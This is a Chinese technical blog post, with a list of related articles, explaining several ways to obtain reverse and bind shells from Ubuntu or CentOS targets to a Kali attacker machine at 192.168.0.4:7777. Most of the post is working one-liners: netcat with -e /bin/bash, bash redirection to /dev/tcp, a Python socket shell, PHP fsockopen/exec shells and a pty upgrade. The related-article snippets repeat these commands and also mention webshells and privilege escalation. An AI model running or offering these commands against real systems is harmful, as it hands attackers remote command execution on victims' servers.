php命令执行反弹nc,NC反弹shell的几种方法

最新推荐文章于 2023-03-14 15:29:33 发布
最新推荐文章于 2023-03-14 15:29:33 发布
阅读量590 收藏 2
点赞数
文章标签: php命令执行反弹nc

假如ubuntu、CentOS为目标服务器系统

kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用

最终是将ubuntu、CentOS的shell反弹到kali上

正向反弹shell

ubuntu或者CentOS上面输入

nc -lvp 7777 -e /bin/bash

kali上输入

nc ip 7777

正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。

需要目标机安装nc。

反向反弹shell

方法1:bash反弹

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc监听端口:

nc -lvp 7777

此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。

方法2:python反弹

反弹shell的命令如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上监听端口:

nc -lvp 7777

在CentOS或者ubuntu下使用python去反向连接,输入:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

此方法ubuntu和Linux均反弹成功。

方法3

首先在kali上输入nc监听:

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向连接,命令如下:

nc -e /bin/bash 192.168.0.4 7777

方法4:php反弹shell

首先在kali上输入:

nc -lvp 7777

然后在目标机上输入:

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'或

php-r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。

遇到反弹后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'

转化为常规的shell。

鲸游
关注
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 719
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
Linux下几种反弹Shell方法的总结与理解
墨痕诉清风的博客
01-09 2496
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port 0>&1 首先,使用nc在kali上监听端口: nc -lvp 7777 然后在CentOS6.5下输入: bash -i >& /de...
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
php命令执行反弹nc,详解NC反弹shell几种方法
weixin_42110533的博客
04-04 703
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
php反弹教程,详解NC反弹shell几种方法
weixin_39625586的博客
04-02 1003
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
php 端口反弹,详解反弹shell命令
weixin_33988332的博客
03-13 699
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell几种姿势:bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地以交互模式打开一个bash>& 输出重定向,将标准输出和标准错误输出都重定向到远程。/dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机器。0&...
php大马如何使用nc反弹提权,使用NC反弹Shell
weixin_39913628的博客
03-13 382
今日中午有某牛牛问我如何使用NC反弹shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!使用NC反弹Shell在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdShell时,首先...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1408
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
NC 反弹shell
最新发布
08-30
几种方法可以实现NC反弹shell。其中一种是使用bash反弹命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接命令如下: ``` nc ...
反弹shell原理与实现
悦分享
08-02 3357
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
php反弹,PHP Webshell 下的端口反弹方法
weixin_29421409的博客
03-10 330
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹shell。这样每次可以直接访问这个ph...
NC反弹的小demo
Quartz's Blog
07-19 517
一个有趣的NC反弹shell的demo#include #include #include #include #include void error(char *msg) { perror(msg); exit(0); } int main(int argc, char *argv[]) { int sockfd, portno
反向连接linux命令参数,linux下常用命令参数详解-nc
weixin_33344629的博客
04-29 243
'nc.exe -h'即可看到各参数的使用方法。基本格式:nc [-options] hostname port[s] [ports] ... nc -l -p port [options] [hostname] [port]-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8-G...
PHP反弹shell
痴人说梦梦中人
09-26 7487
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
如何用PHP执行shell 脚本和 shell命令
weixin_45312916的博客
02-11 2919
php执行shell
XXL-JOB 任务调度中心 后台反弹getshell
m0_49025459的博客
03-14 1852
监听IP先进行监听,然后按照测试是否出网的时候执行一次,就将shell反弹到监听设备上了。那我们就可以更改 GLUE IDE中的命令了,将shell反弹到我们监听的设备。访问漏洞场景,使用弱口令admin/123456,进入后台。选择GLUE IDE,我们可以通过DNSlog判断一下。运行模式一定要选shell模式,其他的地方随便填。刷新之后,出现下图情况,证明设备出网。然后我们保存,然后执行一次。
php 调用远程shell,在PHP中调用php_ssh实现远程登陆linux服务器并执行shell脚本。
weixin_39608479的博客
04-12 605
这个功能主要用于在web端利用程序对远程服务器进行操作,通过PHP_ssh执行shell脚本来实现。首先要安装php_ssh2组件,linux中centos7下有ssh2源,直接安装。window下则需要自行下载dll组件加载,具体方法自行搜索。安装完毕后就可以在PHP执行shell脚本的程序了$ssh_user='root';        //登陆linux的ssh2用户名$ssh_pwd=...
php异步处理shell,如何在Linux和Windows环境中使用PHP执行Shell命令而无需等待结果(异步)...
weixin_34669783的博客
03-11 625
在许多情况下, 你宁愿使用控制台而不是UI来执行php脚本, 但是在某些情况下, 使用UI是触发操作的唯一方法。可能你已经知道如何使用PHP执行bash任务, 但是如果你的任务太繁重且完成时间太长怎么办?没有人希望看到一个小时的进度条, 期望服务器发出答案……至少不会处理工作。在这种情况下, 你将要忽略输出并让你的任务在后台运行。为了实现我们的目标, 我们需要在Windows中使用系统函数, 在u...
php中脚本代码开始,从PHP代码中执行shell脚本
weixin_31100517的博客
04-15 394
我想要做的就是使用PHP执行youtube-dl -x --audio-format mp3 "token"并获得以下参数JSON:从PHP代码中执行shell脚本状态(错误= 0 /成功= 1)保存的文件URL (您将在控制台结果示例中看到它:[avconv] Destination: Jennifer Lopez - Booty ft. Iggy Azalea-nxtIRArhVD4.mp3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值